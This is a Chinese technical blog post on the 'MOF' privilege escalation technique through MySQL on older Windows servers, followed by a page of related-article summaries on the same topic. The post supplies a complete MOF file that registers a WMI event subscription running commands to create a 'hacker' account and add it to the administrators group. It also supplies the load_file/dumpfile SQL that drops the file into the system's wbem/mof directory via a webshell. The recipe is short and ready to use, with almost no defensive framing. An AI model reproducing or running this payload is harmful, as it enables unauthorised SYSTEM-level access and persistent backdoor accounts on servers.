mysql mof提权

已于 2023-05-24 10:14:37 修改
阅读量253 收藏
点赞数
分类专栏: 数据库提权 文章标签: mysql 数据库
于 2023-05-23 15:34:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/130828359
版权

mof 提权的原理就是利用mof目录下的mof文件会一段时间后自动执行,且权限为system,我们就利用此处的。让他执行一些我们想要的命令。

条件

1、低于win2008版本.
2、数据库为 mysql<5.7且知道登录账号密码并且允许外连.

拿到root账号密码后可以开启外联。

这里使用webshell本地上传一个文件到服务器上去

test.mof

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

然后用sql语句把他移动到 C:\WINDOWS\system32\wbem\mof 

select load_file('C:/phpStudy/WWW/test.mof') into dumpfile 'C:/WINDOWS/system32/wbem/mof/test.mof'

然后hack账户就会被建立,并且在administartor组中

不过是三年五载
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统权限提升(二十七)之数据库提权-MySQL MOF提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-22 551
mof是windows系统的一个“托管对象格式”文件(位置:C:/windows/system32/wbem/mof/),其作用是每隔五秒就会去监控进程创建和死亡,mof目录下有两个文件夹(good与bad)。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件,执行成功会移动到good文件夹,执行失败则会移动到bad文件夹。注:MOF提权只能用于Windows系统提权,Linux提权无法使用。
MySQL提权
uanyey的博客
02-25 174
环境: 1、靶机:192.168.186.128 win7 MySQL5.5.29 2、攻击机:192.168.186.130 kali 3、MySQL安装没有所需的lib/plugin目录,需通过ADS创建。 首先查询mysql所在目录 select @@basedir (或 select @@datadir) 如不存在lib/plugin目录,利用ADS创建 select 'xxx' into dumpfile 'C:\\MySQL\\lib\\p...
MySQL提权mof提权
2301_77300311的博客
04-11 538
关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
数据库提权--MOFMYSQL
qq_45936617的博客
10-07 485
MOF提权的利用原理是利用目录下的 nullevt.mof 文件,每隔一段时间(默认5s)都会用系统权限执行一次的特性,来写入cmd命令使其被带入以系统权限执行MOF提权的使用条件是:1、secure_file_priv参数不为null2、有修改nullevt.mof 文件的权限3、数据库用户具有root权限MOF提权的步骤是有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行。
Mysql提权方法总结系列-MOF提权
kracer的博客
02-27 3183
0x01 简介 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 0x02 条件 mysql有读写 C:/Windows/system32/...
Windows提权之第三方组件mysql提权(mof)
mrx56的博客
03-31 3762
为什么要提权? 答:因为webshell的权限一般是继承中间件的权限,此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。 Windows提权常用命令 内置组: Administrators(管理员组) Guests (来宾组,权限最低,默认禁止) Users(新建用户组) net user 查看所有用户信息 net user + 用户名 查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca
mysql提权之udf
wo41ge的博客
12-14 661
UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用。 它有3种返回值,这三种分别是 STRING 字符型 INTEGER 整型 REAL 实数型 提权的前提 mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下 mysql版本小于5.1, udf.dll文件在w
mof提权文件nullevt.mof
03-12
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
Mysql UDF、MOF、反链端口提权.zip
12-14
Mysql UDF、MOF、反链端口提权
MOF_V2.5.1
07-13
MOF_V2.5.1
msf攻击Mysql服务.docx
04-26
3. **exploit/windows/mysql/mysql_mof**:这个模块利用Microsoft Object Definition Language (MOF)文件,可以触发远程代码执行,特别是在Windows MySQL服务器上进行提权。 4. **exploit/windows/mysql/...
MOF-石墨烯复合材料的合成及应用
10-11
MOF-石墨烯复合材料的合成及应用】 金属有机框架(MOFs)是一种新型的多孔晶体材料,因其巨大的比表面积、可调的孔径大小以及丰富的结构多样性,广泛应用于吸附、超级电容器、催化剂等领域。然而,传统MOFs的低...
Mysql-mof提权
告白的博客
08-14 434
0x00 mof提权原理 类似于之前的udf提权,参考https://blog.csdn.net/qq_53577336/article/details/119700116 另外一种mysql提权方式叫做mof提权 在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system权限自动运行文件内脚本,mof提权就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到
mysql mof提权_MySQL_MOF提权
weixin_32148341的博客
01-27 223
一、原理Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:将MOF文件执行为命令行参数及Mofcomp.exe文件使用IMofCompiler接口和$CompileFile方法拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹下的MOF文件中托管对象格式(MOF)文件在 C:\Windows\System32\wbem\MOF...
设置MySQL允许外部访问
LCFBOKE的博客
12-06 3154
MySQL在Navicat上设置允许外部访问
mysqlmof提权详解
weixin_30376323的博客
01-23 195
原理解读: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法1:运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:拖放到%SystemRoot%\System32\Wbem\MOF文件夹的...
使用mof进行数据库提权
qq_37053007的博客
04-29 2044
使用kali下的msf里的mof进行数据库提权第一次写博客没有什么经验,今天因为做题正好看到一个使用mof进行数据库提权的方法,就拿来尝试了一下跟大家来说一下经历首先启动msf,使用seach命令查找一下mysql_version进行连通性测试使用use对这个模块进行调用show options查看一下需要配置的选项配置一下ip地址我们就可以奔放了exploit执行一下,看看局域网里有多少个可以使...
MySQL数据库Root权限MOF方法提权研究
Fly_鹏程万里
07-06 914
MySQL数据库Root权限MOF方法提权研究MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner &amp; MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL W...
MySQL & NaviCat 安装及配置教程(Windows)【安装】
最新发布
绯樱殇雪的博客
07-15 833
MySQL & NaviCat 安装及配置教程
mysql mof 提权
05-31
MySQL MOF(Management Object Format)提权指的是攻击者利用MySQL服务器中的MOF漏洞来执行任意代码,从而实现提权攻击。MOF是一种用于描述Windows系统管理对象的格式,它可以被用来创建、修改和查询Windows系统对象...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值